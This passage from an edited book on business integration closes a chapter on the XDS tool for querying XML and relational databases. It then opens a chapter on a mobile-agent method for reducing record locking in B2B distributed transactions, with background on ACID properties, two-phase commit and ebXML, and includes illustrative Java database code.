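The actual XDSConnections and XDSQuery syntax for this example is the one shown in Figures 7 and 8. Purely as a hedged illustration of the underlying integration task, and not of the XDS implementation itself, the same combination of an XPath query over "prof.xml" and an SQL query over the relational database could be coded directly with standard Java APIs; the connection URL, table, and column names below are hypothetical:

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

// Illustrative only: read teacher codes from an XML document with XPath, fetch each
// teacher's courses from a relational database with SQL, and print a nested XML result.
// This is not the XDS tool's own code; the XPath, URL, table, and column names are made up.
public class TeachersAndCourses {
    public static void main(String[] args) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder().parse("prof.xml");
        NodeList codes = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate("//teacher/@code", doc, XPathConstants.NODESET);

        try (Connection con = DriverManager.getConnection(
                 "jdbc:oracle:thin:@dbhost:1521:orcl", "user", "password");   // hypothetical
             PreparedStatement ps = con.prepareStatement(
                 "SELECT title FROM courses WHERE teacher_code = ? ORDER BY title")) {

            System.out.println("<teachers>");
            for (int i = 0; i < codes.getLength(); i++) {
                String code = codes.item(i).getNodeValue();
                ps.setString(1, code);
                System.out.println("  <teacher code=\"" + code + "\">");
                try (ResultSet rs = ps.executeQuery()) {
                    while (rs.next()) {
                        System.out.println("    <course>" + rs.getString("title") + "</course>");
                    }
                }
                System.out.println("  </teacher>");
            }
            System.out.println("</teachers>");
        }
    }
}
```

The value of the XDS approach over such hand-written code is that the nesting and the XML output structure are declared once in the XDSSchema rather than being hard-coded in the application.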
FUTURE TRENDS
In the future, businesses will surely have to continue exchanging their data using the Web or intranets. Therefore, our tool will continue to be useful. However, XDS only allows making requests for the information stored in the different business data sources; it does not allow updating this information. This would be the main new extension we should add to our tool. The idea would be to update the stored information in the different data sources, for example, from the information embedded in an XML document. This embedded information should be able to update every type of source, relational or XML, indicating the destination of each piece of data in the sources to update. Adding this new feature to the XDS tool would mean it could be used as a full management information system inside a business that mainly works with relational and XML information.
CONCLUSION
The XDS software tool allows querying different types of sources, XML as well as non-XML (relational) ones. Besides, it allows querying each of these sources in its native language. This is a significant advantage because, in this way, it is possible to use all the features of each source. The tool also offers great flexibility in transforming the relational data into an XML presentation, since different transformation schemas can be specified for the XML output. On the other side, XDSQuery, the language used to make the client requests, is an XML
language; therefore, it is possible to create and/or modify queries easily using standard tools like the Document Object Model (DOM) (W3C, 2004a). Finally, as stated, users can define the structure of the XML output document, without any later transformations, using the information of the XDSSchema. In addition to these advantages, the XDS tool has been tested in real environments, always obtaining very satisfactory results. The tool has been tested using the three types of sources, that is, an XML-enabled RDBMS like Oracle, a native XML database like Tamino, and XML documents, and even making requests that involved all three types of sources at the same time. We have studied other tools for obtaining information in XML format from different types of sources, relational and/or XML. We have shown the disadvantages of these tools in relation to our purposes: some of them implement only part of our requirements, and others do not implement them in the most efficient way. Therefore, we can conclude that the XDS tool is a good solution for obtaining XML-format data from different types of sources. That is, it is a good tool for the managerial dimension of business integration, contributing to heterogeneous data integration. More than one source can be accessed in the same query, for example, to combine data from different sources. For each source, its own language is used, which is more powerful. Finally, a user can define the XML output format. All these features can be a great help for businesses, especially when they have to exchange information with other businesses or when they want to present information on the Web. In addition, this information could come from different sources. However, we have also identified a characteristic that could improve our tool.
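For instance, because XDSQuery requests are plain XML, a client application can load and adjust a stored query with the standard DOM API before submitting it. The sketch below is only an illustration of that claim; the file names and the attribute it edits are placeholders rather than the real XDSQuery vocabulary:

```java
import java.io.File;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

// Illustrative sketch: load an XML query document, change one attribute value with
// DOM, and write the modified query back out. Element and attribute names are
// placeholders and do not reproduce the actual XDSQuery element names.
public class EditQuery {
    public static void main(String[] args) throws Exception {
        Document query = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder().parse(new File("query.xml"));

        // Point the request at a different named connection (hypothetical attribute).
        Element root = query.getDocumentElement();
        root.setAttribute("connection", "backupDatabase");

        // Serialize the modified DOM tree back to a file.
        TransformerFactory.newInstance().newTransformer()
                .transform(new DOMSource(query), new StreamResult(new File("query-modified.xml")));
    }
}
```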
REFERENCES
Apache Group. (2003). Jakarta project: DBTags tag library. Retrieved from http://jakarta.apache.org/taglibs
Apache Software Foundation. (2004). Xindice. Retrieved from http://xml.apache.org/xindice/
Braganholo, V. (2002). Updating relational databases through XML views (technical report). Instituto de Informática, Universidade Federal do Rio Grande do Sul.
Brown, S. (2001). Professional JSP (2nd ed.). Wrox Press.
Carey, M. J., Florescu, D., Ives, Z. G., Lu, Y., Shanmugasundaram, J., Shekita, E. J., & Subramanian, S. (2000). XPERANTO: Publishing object-relational data as XML. Proceedings of the International Workshop on the Web and Databases (Informal Proceedings), 105-110.
Carey, M. J., Kiernan, J., Shanmugasundaram, J., Shekita, E. J., & Subramanian, S. (2000). XPERANTO: Middleware for publishing object-relational data as XML documents. VLDB Journal, 646-648.
Chang, B. (2001). Oracle 9i XML handbook. Osborne-McGraw Hill.
Cheng, J., & Xu, J. (2000). IBM DB2 XML Extender: An end-to-end solution for storing and retrieving XML documents. Proceedings of ICDE'00 Conference.
Conrad, A. (2001). A survey of Microsoft SQL Server 2000 XML features. MSDN Library.
dbXML Group. (2004). dbXML. Retrieved from www.dbxml.com/index.html
Deutsch, A., Fernandez, M. F., Florescu, D., Levy, A., & Suciu, D. (1998). XML-QL: A query
language for XML. Proceedings of WWW: The Query Language Workshop (QL).
Elmasri, R., & Navathe, S. (2002). Fundamentos de sistemas de bases de datos (3rd ed.). Addison Wesley.
Fermoso, A. (2003). XBD: Sistema de consulta basado en XML a bases de datos relacionales (PhD thesis). Facultad de Ingeniería, Universidad de Deusto.
Fernández, M., Kadiyska, Y., Morishima, A., Suciu, D., & Tan, W. C. (2002). SilkRoute: A framework for publishing relational data in XML. ACM Transactions on Database Systems (TODS), 27(4).
Fernández, M., Morishima, A., Suciu, D., & Tan, W. C. (2001). Publishing relational data in XML: The SilkRoute approach. IEEE Data Engineering.
Fernández, M., Tan, W., & Suciu, D. (2000). SilkRoute: Trading between relations and XML. Proceedings of the Ninth International World Wide Web Conference.
Fischer, P. C., & Gucht, D. V. (1984). Weak multivalued dependencies. Proceedings of the 3rd ACM SIGACT-SIGMOD Symposium on Principles of Database Systems, 266-274.
Funderburk, J. E., Kiernan, G., Shanmugasundaram, J., Shekita, E., & Wei, C. (2002). XTABLES: Bridging relational technology and XML. IBM Systems Journal, 41(4).
IBM. (2001). IBM Net.Data for OS/2, Windows NT, and UNIX administration and programming guide, Version 7. IBM Corporation.
IBM. (2002). IBM DB2 universal database. XML Extender administration and programming, version 8. IBM Corporation.
Intelligent Systems Research. (2003). Merging ODBC data into XML: ODBC2XML. Retrieved February, from www.intsysr.com/odbc2xml.htm
Kappel, G., Kapsammer, E., & Retschitzegger, W. (2000). X-Ray: Towards integrating XML and relational database systems. Proceedings of the International Conference on Conceptual Modeling, the Entity Relationship Approach, 339-353.
Laddad, R. (2000). XML APIs for databases: Blend the power of XML and databases using custom SAX and DOM APIs. Java World, January.
Laux, A., & Martin, L. (2000). XUpdate (working draft). Retrieved from http://exist-db.org/xmldb/xupdate/xupdate-wd.html
McBrien, P., & Poulovassilis, A. (2001). A semantic approach to integrating XML and structured data sources. Proceedings of the 13th International Conference on Advanced Information Systems Engineering (CAiSE01).
Megginson, D. (2004). Simple API for XML (SAX). Retrieved from http://sax.sourceforge.net/
Meier, W. (2004). eXist. Retrieved from http://exist.sourceforge.net
Melton, J. (2003). XML-related specifications (SQL/XML) (ISO-ANSI working draft). ISO-ANSI, September.
Microsoft. (2001). SQL Server 2000: XML and Internet support. Microsoft Corp.
Oracle. (2002a). Oracle 9i Release 2. Database concepts. Oracle Corp., March.
Oracle. (2002b). Oracle 9i Release 2. XML API reference—XDK and Oracle XML DB. Oracle Corp., March.
Oracle. (2002c). Oracle 9i Release 2. XML database developer's guide. Oracle XML DB. Oracle Corp., October.
Oracle. (2002d). Oracle 9i Release 2. XML developer's kits guide—XDK. Oracle Corp., March.
Pal, S., Fussell, M., & Dolobowsky, L. (2004). XML support in Microsoft SQL Server 2005. Retrieved May, from http://msdn.microsoft.com/xml/default.aspx?pull=/library/enus/dnsql90/html/sql25xmlbp.asp
Pal, S., Parikh, V., Zolotov, V., Giakoumakis, L., & Rys, M. (2004). XML best practices for Microsoft SQL Server 2005. Retrieved June, from http://msdn.microsoft.com/xml/default.aspx?pull=/library/enus/dnsql90/html/sql25xmllbp.asp
Rollman, R. (2003). Optimizing XPath queries: Translate XML views into FOR XML EXPLICIT queries. SQL Server Magazine, October.
Roth, M. A., Korth, H. F., & Silberschatz, A. (1988). Extended algebra and calculus for nested relational databases. ACM Transactions on Database Systems, 13(4), 389-417.
Shanmugasundaram, J., Kiernan, J., Shekita, E. J., Fan, C., & Funderburk, J. (2001). Querying XML views of relational data. The VLDB Journal, 261-270.
Shanmugasundaram, J., Tufte, K., Zhang, C., He, G., DeWitt, D. J., & Naughton, J. F. (2001). Relational databases for querying XML documents: Limitations and opportunities. The VLDB Journal, 302-314.
Silberschatz, A., Korth, H., & Sudarshan, S. (1998). Fundamentos de bases de datos (3rd ed.). McGraw-Hill.
Software AG. (2003a). Introducing Tamino. Tamino version 4.1.4. Software AG.
Software AG. (2003b). Tamino XML Schema user guide. Tamino version 4.1.4. Software AG.
Turau, V. (1999). Making legacy data accessible for XML applications. Retrieved from http://citeseer.nj.nec.com/turau99making.html
Vittory, C. M., Dorneles, C. F., & Heuser, C. A. (2001). Creating XML documents from relational data sources. Proceedings of ECWEB (Electronic Commerce and Web Technologies) 2001. Lecture notes in computer science (vol. 2115, pp. 60-70). Springer Verlag.
World Wide Web Consortium. (2005a). Document Object Model (DOM). Retrieved from www.w3.org/DOM/DOMTR
World Wide Web Consortium. (2005b). Document Type Declaration (DTD). Retrieved from www.w3.org/TR/REC-xml/
World Wide Web Consortium. (2005c). Extensible Markup Language (XML). Retrieved from www.w3c.org/xml
World Wide Web Consortium. (2005d). Extensible Stylesheet Language (XSL). Retrieved from www.w3c.org/Style/XSL
World Wide Web Consortium. (2005e). XML Path Language (XPath). Retrieved from www.w3c.org/TR/xpath
World Wide Web Consortium. (2005f). XML Schema. Retrieved from www.w3c.org/2001/XMLSchema
World Wide Web Consortium. (2005g). XQuery: A query language for XML. Retrieved from www.w3c.org/TR/xquery
X-Hive Corporation. (2005). X-Hive/DB. Retrieved from www.x-hive.com
Software AG. (2003c). XQuery 4 user guide. Tamino version 4.1.4. Software AG.
This work was previously published in Adaptive Technologies and Business Integration: Social, Managerial and Organizational Dimensions, edited by M. Cunha; B. Cortes; G. Putnik, pp. 282-307, copyright 2007 by Information Science Reference (an imprint of IGI Global).
Chapter 6.6
A Parallel Methodology for Reduction of Coupling in Distributed Business-to-Business E-Commerce Transactions Anthony Mark Orme Athens State University, USA Letha H. Etzkorn University of Alabama, USA
ABSTRACT
Recently, new standards for business-to-business (B2B) e-commerce transactions have relaxed standard database transaction properties in order to reduce extended record locking. In this paper, we provide a parallel methodology employing a mobile/intelligent agent framework to alleviate extended record locking while adhering to standard database transaction properties. Our methodology provides a minimum 30% reduction in record locking compared to the new B2B standards.
INTRODUCTION
The Internet boom of the last decade has led to the realization that business automation is possible on a wider scale than ever before. Prior to the B2B push of the 1990s, electronic data interchange (EDI) was the industry standard for business automation across organizational boundaries. EDI provided a standard set of messages that business partners used to pass data between their respective applications. The EDI solution suffered from limited reusability due to the high degree
of coupling required between applications and a high cost of implementation (Weigand, Heuvel, & Dignum, 1998), which translates to a higher cost per transaction. These factors prohibited smaller businesses from implementing EDI-based solutions (Weigand et al., 1998). A key benefit of the research in business automation is a lower transaction cost; the lowered transaction cost has been the impetus that has driven the latest B2B e-commerce research. The result of early B2B automation was the development of several proprietary B2B frameworks1 that defined a set of services to provide pairwise interoperability between two companies for integration of their enterprise applications (Ariba Inc., 2006). However, the pairwise interoperability was limited by the development of many competing frameworks and a lack of interoperability between the competing frameworks. There are many examples of B2B e-commerce transactions that parallel logistics management problems that require coordination of multiple interactions between many trading partners. These logistic management problems require distributed transaction support on relational database management systems (Riccardi, 2001) not provided in these B2B frameworks. Therefore, front-end applications provide the distributed transaction support required for many B2B and logistics management problems. If these front-end applications use traditional distributed transaction techniques, the possibility of extended record locking across organizational boundaries exists. In long-running transactions, these extended record locks may not be desirable and must be considered as a component in the cost of a B2B e-commerce transaction. Extended record locking can be illustrated with the following example: Suppose company A is building widgetA. In order to build widgetA, company A needs widgetB from company B and widgetC from company C. Suppose company B possesses exactly five widgetBs at the current time. Also, suppose company C has just sold its last widgetC and must receive a shipment from the
factory before it has new widgetCs available for purchase. A transaction goes out from company A to both companies B and C. This transaction asks to purchase a widgetB from company B and a widgetC from company C. The database in company B locks the record corresponding to one of its five widgetBs. This widget will be held until the overall transaction is complete. Meanwhile, company C is unable to complete its part of the transaction, because it has not received its shipment of widgetCs. The record in company B could be locked for hours or days, until the overall transaction completes. In the meantime, several hours or a day later, another transaction request from a different customer arrives at company B. This request is for five widgetBs. Company B is unable to satisfy this request, due to the locked record for one of its widgetBs. Much of the current research on distributed, Internet-based, B2B e-commerce transactions focuses on the possibility of having transactions characterized by their long-running nature; a consequence of this is the possibility of extended record locks being held by an integrated application from an outside organization. Therefore, the autonomy of individual trading partners may be compromised (Dan et al., 2001), which may lead to a potential loss of sales under certain circumstances. Some have suggested easing the restrictions of the properties of standard transaction-based systems, "Atomic," "Consistent," "Isolated," and "Durable," known as the ACID properties (Riccardi, 2001), as a solution to the potential problem of extended record locking (Dan et al., 2001). However, easing the restrictions associated with the ACID properties is unsatisfactory in many ways. First, data anomalies may be introduced into transaction-based systems when relaxing the ACID properties (Attaluri & Salem, 2002). Second, all databases implement ACID (Riccardi, 2001); ignoring this feature limits the reuse of existing investments, since correctness must then be achieved via another method, at additional cost. The only problem with retaining the ACID
properties is the extended record locking and potential rollback of work that has been accomplished in a transaction when one system fails, when in some cases preserving the work would be preferable (Organization for the Advancement of Structured Information Standards, 2002a) (Organization for the Advancement of Structured Information Standards, 2002b). For example, suppose the “Isolated” ACID property is not being supported. This means that, for example, one transaction could read temporary data occurring during another transaction; that data might not be valid later. In a similar example to the one given earlier, suppose company C buys more widgetCs to replenish its stock. It requests these widgetCs from company D and at the same time requests some widgetDs from company D because there is a discount if you buy both widgetCs and widgetDs at the same time. It initially receives some widgetCs, and those enter its database, but the entire transaction with company D has not yet completed. During this time, the transaction from company B comes through. Company B’s request (running at company C) can see that there are widgetCs available, so it provides these widgetCs to company B. Unfortunately, the transaction with company D fails, since no widgetDs are available, and company C is unwilling to pay a higher price for widgetCs. Then company C has no widget Cs after all, and has erroneously sold a widgetC that it does not possess to company B. We examine the possibility that B2B distributed transactions should adhere to the ACID properties for transaction-based systems. Also, we propose a mobile/intelligent agent2 framework that supports B2B, e-commerce, distributed transactions with a reduced record locking time compared to traditional distributed ACID-based transactions. As we mentioned earlier, a software framework provides a partial software solution. It defines the architecture for software systems that are further defined by the user to apply to a particular problem. Our methodology exploits
the use of a parallel approach versus a linear sequential approach to B2B transactions. We use mobile/intelligent agents to implement the parallelism of our approach. A parallel methodology such as the one described in this paper breaks a task into multiple subtasks, each of which can be executed simultaneously. Our framework exploits the use of mobile agents (MAs) working in parallel as one mechanism to achieve the reduction in record locking time. Trading partner agreements (TPAs) are used to enable MAs to negotiate and finalize interactions with individual vendors. For the purpose of this paper we use the term transaction to define a data manipulation in which a state change of one or more tuples (rows) in one or more relations (tables) occurs in a database. An autonomous transaction is a transaction that occurs on a single system. A distributed transaction refers to a transaction that effects a change on more than one system, meaning data changes on more than one database. Finally, we introduce the term trading partner interaction to encompass all of the messaging capabilities required in order to achieve a transaction between trading partners; therefore, a distributed transaction is a set consisting of one or more trading partner interactions. The remainder of this paper is organized as follows: first, the background necessary to understand the relationship between transactions and distributed transactions and a standard two-phase commit protocol3 (Riccardi, 2001) with respect to the ACID properties (Riccardi, 2001) is provided. Then the ACID properties are also described. This includes a brief description of B2B transactions and ebXML (a new standard for B2B distributed transactions). The Methodology section outlines our architecture to support a B2B distributed transaction that adheres to the ACID properties and reduces record locking. Also in the Methodology section are the results of our research when applied to a specific transaction scenario. In the Discussion section we discuss the results. Finally, a conclusion to our research
is presented and topics for further investigation are outlined.
BACKGROUND
The background section is divided into the following subsections: the first explores the ACID properties and the two-phase commit protocol, and their relationship to autonomous transactions and distributed transactions. The next section provides a look at B2B transactions as they relate to our architecture. After that, the last section provides an overview of a few core components of ebXML and their relation to business.
Transaction Properties
Although the concept of a transaction is not unique to a database system, the ACID properties and two-phase commit protocol provide the basis for database system transactions. The ACID properties that follow provide a level of certainty and assurance on the outcome of a transaction and define a set of restrictions placed on the data.
• Atomic: A transaction must execute exactly once and must be atomic: either all of the work is done or none of it is.
• Consistent: A transaction must preserve the integrity constraints of data, transforming one legal (consistent) state of data into another legal (consistent) state of data.
• Isolated: A transaction must be a unit of isolation, which means that concurrent transactions should behave as if each were the only transaction running in the system.
• Durable: If a transaction commits, the system guarantees that its updates can persist and will not be undone.
These ACID properties have formed a basis for both autonomous and distributed transactions. These properties
guarantee transaction system developers that transaction-related data adheres to well-defined semantics, and that the image of the data before, during, and after the transaction meets the defined criteria for each of the ACID properties. The Consistent and Isolation properties define a set of rules on both the data state and the visibility of data in the scope of a transaction. Both the Consistent and Isolation properties are similar in an autonomous and a distributed transaction. The Consistent property assures that, during a transaction, tuples modified by an insert, update, or delete statement in the scope of a transaction must be in agreement with the constraints that govern the validity of the relationships among the data, as defined by the assumptions of the designers of the system. The Isolation property makes assurances on the visibility of the changes made to a tuple with respect to other transactions. In other words, the Isolation property governs the readability of tuples by other transactions when one transaction has previously modified that tuple in its scope. In most modern database management systems (DBMS), the implementation of the Isolation property provides different levels of granularity with respect to the visibility of modified data between transactions. Table 1 summarizes the ANSI isolation levels (American National Standards Institute, 1992) with respect to known data anomalies. Table 1 shows three data anomalies, Dirty Read, Non-Repeatable Read, and Phantom Read, that are used to differentiate the four isolation levels of Read Uncommitted, Read Committed, Repeatable Read, and Serializable. Each data anomaly represents a potential problem for transactions in terms of data changing in the scope of a transaction. A dirty read allows a transaction to read uncommitted data from another transaction. A non-repeatable read occurs when a transaction rereads data committed by another transaction and sees the changes. A phantom read occurs when a transaction executes a query again and sees data inserted by another transaction. Both
the non-repeatable read and phantom read are point-in-time correct, meaning any read sees only committed data from other transactions. A dirty read, on the other hand, allows data to be viewed that may eventually be rolled back by the modifying transaction. Each of these data anomalies may affect transaction logic by potentially supplying seemingly inconsistent views of data as the transaction progresses. The strictest isolation level, serializable, must execute in such a way that transactions appear to be executing one at a time (serially) rather than concurrently. Concurrent transactions executing in serializable mode can only make database changes that they could have made if the transactions ran one after the other. Concurrent transactions executing in serializable mode require record locking in each concurrent transaction, and the DBMS must allow a transaction to view all tuples in the database as they were when the transaction started. A serializable isolation level guarantees that none of the data anomalies can occur in the scope of a transaction, at the cost of high overhead to make concurrent transactions appear to execute one at a time. At the other end of the spectrum, a read uncommitted transaction requires less overhead than a serializable transaction; however, this reduction in overhead allows all anomalies to occur in the scope of a transaction. Most DBMSs opt for a commonly accepted default isolation level of read committed, which allows the possibility of both a non-repeatable read and a phantom read, but does not allow a transaction to
read or modify uncommitted data from another transaction. It is important to note that the length of the record locking does not define the isolation levels of a transaction; they are defined in terms of the possible data anomalies that may occur in the scope of a transaction. Therefore, a DBMS is free to implement these isolation levels as it sees fit, using record locking as a mechanism to achieve these different isolation levels. The durable and atomic properties define rules for implementation that guarantee the state of the data with regard to the transaction as a single unit. The durable property assures that once a change to any tuple in an autonomous or distributed transaction is made permanent, the implementation guarantees this change even in the event of a system failure. The atomic property assures that all changes made to any tuple can be made permanent (committed) or undone (rolled back) in an all-or-nothing manner. A transaction, with regard to the state of the data, is defined as a logical unit of work in which tuples are modified, and these modifications are either all committed or all rolled back. In an autonomous transaction the Atomic property defines a relationship between individual insert, update, and delete statements; therefore all statements must be able to be made permanent or undone as a unit. Distributed transactions have additional requirements to ensure the atomicity property; all participants need to be assured as to the final outcome of the transaction.
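As a concrete, hedged illustration of how these properties surface in application code, the JDBC sketch below selects one of the ANSI isolation levels discussed above and then holds a row lock until commit; the connection URL and table are hypothetical:

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;

// Illustrative sketch: choose an ANSI isolation level through JDBC and hold a
// row lock until the transaction ends. The URL and table are hypothetical.
public class IsolationDemo {
    public static void main(String[] args) throws Exception {
        try (Connection con = DriverManager.getConnection(
                "jdbc:oracle:thin:@dbhost:1521:orcl", "user", "password")) {
            con.setAutoCommit(false);
            // Other options: TRANSACTION_READ_UNCOMMITTED, TRANSACTION_REPEATABLE_READ,
            // TRANSACTION_SERIALIZABLE (support varies by DBMS).
            con.setTransactionIsolation(Connection.TRANSACTION_READ_COMMITTED);

            // SELECT ... FOR UPDATE locks the matching row; the lock is held
            // until commit() or rollback(), so other writers must wait.
            try (PreparedStatement ps = con.prepareStatement(
                     "SELECT quantity FROM widgets WHERE id = ? FOR UPDATE")) {
                ps.setInt(1, 42);
                try (ResultSet rs = ps.executeQuery()) {
                    if (rs.next() && rs.getInt("quantity") > 0) {
                        try (PreparedStatement upd = con.prepareStatement(
                                 "UPDATE widgets SET quantity = quantity - 1 WHERE id = ?")) {
                            upd.setInt(1, 42);
                            upd.executeUpdate();
                        }
                    }
                }
            }
            con.commit();   // releases the row lock
        }
    }
}
```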
The two-phase commit protocol is a standard that provides distributed transaction coordination. The coordination is achieved by defining one system as the distributed transaction coordinator (DTC), while the other participants become resource managers (RMs). Attaluri and Salem (2003) provide a detailed account of the two-phase commit protocol; in general, a series of messages are passed between the DTC and the RMs that demarcate a transaction and allow it to progress towards a finalized state, either committed or aborted. The distributed two-phase commit provides the mechanism for each RM to assure that its data state is consistent with respect to the finalized state of the distributed transaction. The DTC and RMs work together via the two-phase commit protocol to assure the atomicity and consistency properties; however, the Consistent, Isolation, and Durability properties are generally considered the responsibility of the RMs to assure within their local context. The two-phase commit has two distinct phases:
• Prepare phase: The DTC requests that all RMs promise to commit or roll back the transaction. All participants respond to the DTC that they are prepared or not prepared.
• Commit phase: The DTC asks all RMs to commit the transaction.
If any participant cannot prepare, or if a system component fails, the coordinator asks all databases to roll back the transaction.
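For databases that expose the X/Open XA interface, the coordinator side of this protocol can be sketched with the standard Java XA types. The XADataSource configuration and the Xid values are assumed to be supplied elsewhere, so this is only an outline of the prepare/commit voting, not a production implementation:

```java
import java.sql.Connection;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import javax.sql.XAConnection;
import javax.sql.XADataSource;
import javax.transaction.xa.XAException;
import javax.transaction.xa.XAResource;
import javax.transaction.xa.Xid;

// Outline of a coordinator (DTC) driving two-phase commit across several resource
// managers through the standard XA interface. XADataSource configuration and Xid
// values are assumed to be provided by the caller; error handling is minimal and
// read-only (XA_RDONLY) votes are ignored to keep the outline short.
public class TwoPhaseCommitSketch {

    public static void runDistributedTransaction(List<XADataSource> partners,
                                                 List<Xid> branchIds,
                                                 List<String> sqlPerPartner) throws Exception {
        List<XAConnection> xaConnections = new ArrayList<>();
        List<XAResource> resources = new ArrayList<>();

        // Do the work on every branch; the updated records stay locked from here on.
        for (int i = 0; i < partners.size(); i++) {
            XAConnection xac = partners.get(i).getXAConnection();
            XAResource res = xac.getXAResource();
            xaConnections.add(xac);
            resources.add(res);

            res.start(branchIds.get(i), XAResource.TMNOFLAGS);
            try (Connection con = xac.getConnection();
                 Statement stmt = con.createStatement()) {
                stmt.executeUpdate(sqlPerPartner.get(i));   // e.g. reserve a widget
            }
            res.end(branchIds.get(i), XAResource.TMSUCCESS);
        }

        // Phase one: every RM votes while its records remain locked.
        boolean allPrepared = true;
        for (int i = 0; i < resources.size(); i++) {
            try {
                if (resources.get(i).prepare(branchIds.get(i)) != XAResource.XA_OK) {
                    allPrepared = false;
                }
            } catch (XAException e) {
                allPrepared = false;    // this RM cannot prepare
            }
        }

        // Phase two: commit everywhere or roll back everywhere, releasing the locks.
        for (int i = 0; i < resources.size(); i++) {
            if (allPrepared) {
                resources.get(i).commit(branchIds.get(i), false);   // false = two-phase
            } else {
                resources.get(i).rollback(branchIds.get(i));
            }
            xaConnections.get(i).close();
        }
    }
}
```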
B2B TRANSACTIONS
One B2B transaction approach popularized during the Internet expansion was the concept of the B2B frameworks. These B2B frameworks took a services-oriented approach to providing in-
teroperability between trading partners that have implemented the same B2B framework. Several competing frameworks have been developed such as eCo, commerce XML (cXML), and RosettaNet; each provides a solution that allows businesses to take advantage of e-commerce transactions. Business partners wishing to benefit from a B2B framework would integrate their enterprise applications as shown in Figure 1. Several advantages have been realized in these B2B frameworks, such as real-time access products and services. However, as a whole, B2B frameworks do not address interoperability between competing frameworks. The lack of interoperability between frameworks requires that front-end logistics management applications provide distributed transaction support to achieve an atomic transaction. The application acts as the DTC performing the synchronization task for a distributed transaction. A linear sequential approach to transaction management is used to accomplish the individual interactions with each trading partner participating in the distributed transaction. As with its predecessor, EDI, B2B framework messaging facilities are large and loaded exclusively for an individual trading partner interaction. Trading partner interactions are handled on an individual basis: one after another all requirements for the distributed transaction are fulfilled. This linear progression coupled with the ACID properties form a basis for the problem of extended record locking. The isolation property guarantees that no transaction can see the effect of another’s transaction before the distributed transaction comes to a final state. Therefore, the isolation property requires each trading partner to hold locks on records being updated until the distributed transaction is complete. These locks are held indefinitely on a trading partner’s system as the application moves on to the next trading partner while the distributed transaction progresses. The Atomic property, when applied to a distributed transaction, requires that all trading partners that participate come to an agreement on the final state of the distributed
transaction. The distributed transaction is either committed or aborted based upon the two-phase commit protocol. If all trading partners acknowledge that they are in a prepared state, the logistics management application acting as the DTC signals each trading partner to commit; otherwise, it sends the signal to abort. When the trading partner commits or aborts its respective transaction; the record locks are released and the effects of the distributed transaction become visible to other applications. This linear progression approach follows from a mindset based on modular sequential programming techniques. It is this linear progression that is the potential cause of extended record locking. Therefore, further research based on a nonsequential and nonlinear paradigm is needed to provide real-time collaboration in the e-commerce market.
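As a minimal sketch of this linear progression and why it extends record locking (the TradingPartner type and its methods are hypothetical, not part of any B2B framework), each interaction starts only after the previous one has finished, so records locked early stay locked for the whole sequence:

```java
import java.util.List;

// Hypothetical stand-in for one trading partner's enterprise interface.
interface TradingPartner {
    void reserveAndLock();   // does the work and leaves the records locked
    void commit();           // releases the locks and makes the change visible
    void rollback();
}

// Sketch of the linear sequential approach: partner i+1 is not contacted until
// partner i has finished, so locks taken early are held for the entire sequence.
public class LinearProgressionSketch {
    public static void run(List<TradingPartner> partners) {
        int locked = 0;
        try {
            for (TradingPartner partner : partners) {
                partner.reserveAndLock();   // earlier partners are still holding locks here
                locked++;
            }
            for (TradingPartner partner : partners) {
                partner.commit();           // only now are the record locks released
            }
        } catch (RuntimeException failure) {
            for (int i = 0; i < locked; i++) {
                partners.get(i).rollback(); // undo and unlock everything done so far
            }
        }
    }
}
```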
ebXML Core Components
The Organization for the Advancement of Structured Information Standards (OASIS) is a global consortium that drives the development, convergence, and adoption of e-business standards (OASIS, 2002a). OASIS and the United Nations jointly sponsor ebXML, a global framework for e-business data exchange. In the past (for up to 20 years), most large companies have used EDI. As discussed earlier in the introduction, EDI is management intensive and also requires expensive software. This puts EDI out of reach for many smaller companies (Weigand et al., 1998). More recently, the advance of the Internet has made lower cost, Internet-based, e-business solutions popular. Many early Internet e-business solutions were proprietary solutions expressed in a format called Extensible Markup Language (XML). XML
is a simple information exchange format and does not have, in itself, any e-business capabilities, so each new e-business solution based on XML alone was a unique, unstandardized solution. Thus, ebXML is intended to solve two problems. It replaces the high cost of EDI with a relatively inexpensive Internet-based solution. It also addresses the spread of incompatible XML-based B2B frameworks. One way ebXML addresses these incompatibilities is by defining a set of core components that are reusable across all industries. OASIS (2002b) contains a complete reference for all core components of ebXML. A TPA, developed by IBM, defines how trading partners interact by defining the general contract terms and conditions; participant roles (buyers, sellers); communication and security protocols; and business processes (Dan et al., 2001). Therefore, the XML-based TPA documents capture the essential information upon which trading partners must agree in order for their applications and business processes to communicate. The specification for a TPA (Dan et al., 2001) includes:
• Identification, to uniquely identify the TPA document and the parties;
• Communication, to specify the transport protocol(s) and electronic addresses of the parties;
• Security, to define the certificates used for authentication, including non-repudiation, and a digital envelope;
• Invocation-independent properties, for example, the valid duration of the TPA;
• Data definition, for describing formats of the data being passed around;
• Role definition, which describes each of the roles specified in the TPA filled by specific parties;
• Action list, to describe the requests each party can issue to the other; these actions are the independent units of work (the action definitions define the associated message flows between the invoker and the service provider, responsiveness, failure handling, and other attributes);
• Sequencing rules, to describe valid action invocation sequences in each party;
• Global properties, to describe default properties of various fields in the TPA; and
• Comments, to describe handling of disputes, termination of the TPA as a whole, and other exceptional conditions.
